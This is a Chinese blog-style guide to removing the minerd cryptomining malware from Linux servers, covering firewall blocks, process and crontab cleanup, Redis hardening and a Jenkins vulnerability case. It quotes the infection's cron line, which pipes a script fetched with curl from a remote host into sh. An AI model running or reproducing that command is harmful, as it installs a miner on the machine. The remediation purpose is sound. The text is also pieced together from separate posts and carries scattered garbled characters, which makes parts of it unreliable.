iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会茄伍返以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给颤饥攻击者使用config指令加大难度橘物
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
有位朋友说,他服务器使用的好好的,服务商突然封了他服务器,说是被检测出挖矿,这位朋友一脸懵“我开游戏的,挖什么矿”。突然地关停服务器导致这位朋友损失惨重,那么为什么会被检测出挖矿,以及怎么处理呢?感兴趣的话就继续往下看吧~
遇到以上问题,需要先找服务器商对其说明实际情况,配合他们排查,基本上就是中了挖矿病毒。
最简单的方法就是重装系统,但是系统盘数据都会清空,这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统,需要把自己的文件扫毒一遍确认安全后再导入服务器。
但是服务器里如果有很多重要的文件还有比较难配置的环境,那就需要排查删除挖矿程序,全盘扫毒,删除可疑文件,一个个修复病毒对系统好猜的修改。
防范建议:
1.尽量不要使用默认密码和端口,改一个比较复杂的密码
2.可以使用宝塔面板登陆服务器友大型
3.系统自带的防火墙、安全防护都不要关仿链闭
1.发现cpu异常,查看对应的进程信息
2.查看进程发现是挖矿进程在执行
3.确定是挖矿病毒,查败逗看进程的执行文件链接到哪里,发现是jenkins的工作目录,最后结果发现是jenkins的蠢裤漏洞导致自动创建CI计划,进行启动挖矿脚本
4.查看虚机密码是否被破解登录
5.查找挖矿文件
6.检查定时任务脚本
jenkins CVE-2018-1999002 漏察档卖洞修复: https://paper.seebug.org/648/
jenkings漏洞利用: https://xz.aliyun.com/t/4756
CI安全隐患: https://www.jianshu.com/p/8939aaec5f25
jenkins漏洞描述地址: https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)